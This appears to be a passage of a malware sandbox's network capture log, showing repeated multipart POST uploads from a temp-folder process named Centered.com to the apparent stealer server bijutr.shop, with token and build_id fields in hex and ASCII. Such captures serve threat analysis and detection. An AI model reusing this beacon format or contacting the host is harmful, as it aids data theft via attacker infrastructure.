                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      49192.168.2.749943188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:03 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JWB1NYCJM7G4EUKNOHVA
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 6533
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:03 UTC6533OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 57 42 31 4e 59 43 4a 4d 37 47 34 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 42 31 4e 59 43 4a 4d 37 47 34 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 42 31 4e 59 43 4a 4d 37 47 34 45 55 4b 4e 4f 48 56 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------JWB1NYCJM7G4EUKNOHVAContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------JWB1NYCJM7G4EUKNOHVAContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------JWB1NYCJM7G4EUKNOHVACont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:04 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      50192.168.2.749945188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:05 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DJ5XLFCJM7GV3EUKXLFU
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 3269
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:05 UTC3269OUTData Raw: 2d 2d 2d 2d 2d 2d 44 4a 35 58 4c 46 43 4a 4d 37 47 56 33 45 55 4b 58 4c 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 35 58 4c 46 43 4a 4d 37 47 56 33 45 55 4b 58 4c 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 35 58 4c 46 43 4a 4d 37 47 56 33 45 55 4b 58 4c 46 55 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------DJ5XLFCJM7GV3EUKXLFUContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------DJ5XLFCJM7GV3EUKXLFUContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------DJ5XLFCJM7GV3EUKXLFUCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:06 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      51192.168.2.749946188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:06 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----PZMGDJECBA1N7QIE37YC
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 11445
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:06 UTC11445OUTData Raw: 2d 2d 2d 2d 2d 2d 50 5a 4d 47 44 4a 45 43 42 41 31 4e 37 51 49 45 33 37 59 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 50 5a 4d 47 44 4a 45 43 42 41 31 4e 37 51 49 45 33 37 59 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 50 5a 4d 47 44 4a 45 43 42 41 31 4e 37 51 49 45 33 37 59 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------PZMGDJECBA1N7QIE37YCContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------PZMGDJECBA1N7QIE37YCContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------PZMGDJECBA1N7QIE37YCCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:07 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      52192.168.2.749947188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:08 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----37QQQQ16FUSRQQ1VAS2D
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 14153
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:08 UTC14153OUTData Raw: 2d 2d 2d 2d 2d 2d 33 37 51 51 51 51 31 36 46 55 53 52 51 51 31 56 41 53 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 33 37 51 51 51 51 31 36 46 55 53 52 51 51 31 56 41 53 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 33 37 51 51 51 51 31 36 46 55 53 52 51 51 31 56 41 53 32 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------37QQQQ16FUSRQQ1VAS2DContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------37QQQQ16FUSRQQ1VAS2DContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------37QQQQ16FUSRQQ1VAS2DCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:09 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      53192.168.2.749948188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:09 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----WLN79ZCTRI58YUAI5PZ5
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 4277
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:09 UTC4277OUTData Raw: 2d 2d 2d 2d 2d 2d 57 4c 4e 37 39 5a 43 54 52 49 35 38 59 55 41 49 35 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 4e 37 39 5a 43 54 52 49 35 38 59 55 41 49 35 50 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 4e 37 39 5a 43 54 52 49 35 38 59 55 41 49 35 50 5a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------WLN79ZCTRI58YUAI5PZ5Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------WLN79ZCTRI58YUAI5PZ5Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------WLN79ZCTRI58YUAI5PZ5Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:10 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      54192.168.2.749949188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:11 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----T2689RQIEU3EUA1N7YM7
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 6249
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:11 UTC6249OUTData Raw: 2d 2d 2d 2d 2d 2d 54 32 36 38 39 52 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 54 32 36 38 39 52 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 54 32 36 38 39 52 51 49 45 55 33 45 55 41 31 4e 37 59 4d 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------T2689RQIEU3EUA1N7YM7Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------T2689RQIEU3EUA1N7YM7Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------T2689RQIEU3EUA1N7YM7Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:12 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      55192.168.2.749950188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:12 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----O8Q1DJMYMYMYU3ECJMGD
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 4573
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:12 UTC4573OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 51 31 44 4a 4d 59 4d 59 4d 59 55 33 45 43 4a 4d 47 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------O8Q1DJMYMYMYU3ECJMGDContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------O8Q1DJMYMYMYU3ECJMGDContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------O8Q1DJMYMYMYU3ECJMGDCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:13 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:13 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      56192.168.2.749951188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:14 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----T26XT2VAAAAAAAIM7GDB
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 1977
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:14 UTC1977OUTData Raw: 2d 2d 2d 2d 2d 2d 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 37 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 37 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 37 47 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------T26XT2VAAAAAAAIM7GDBContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------T26XT2VAAAAAAAIM7GDBContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------T26XT2VAAAAAAAIM7GDBCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:15 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      57192.168.2.749952188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:15 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BA1VAI58YMYU379R1D26
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 3161
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:15 UTC3161OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 32 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------BA1VAI58YMYU379R1D26Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------BA1VAI58YMYU379R1D26Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------BA1VAI58YMYU379R1D26Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:16 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      58192.168.2.749953188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:11:17 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----R9HLNOHDJMYUAA1DT0HL
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 1697
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
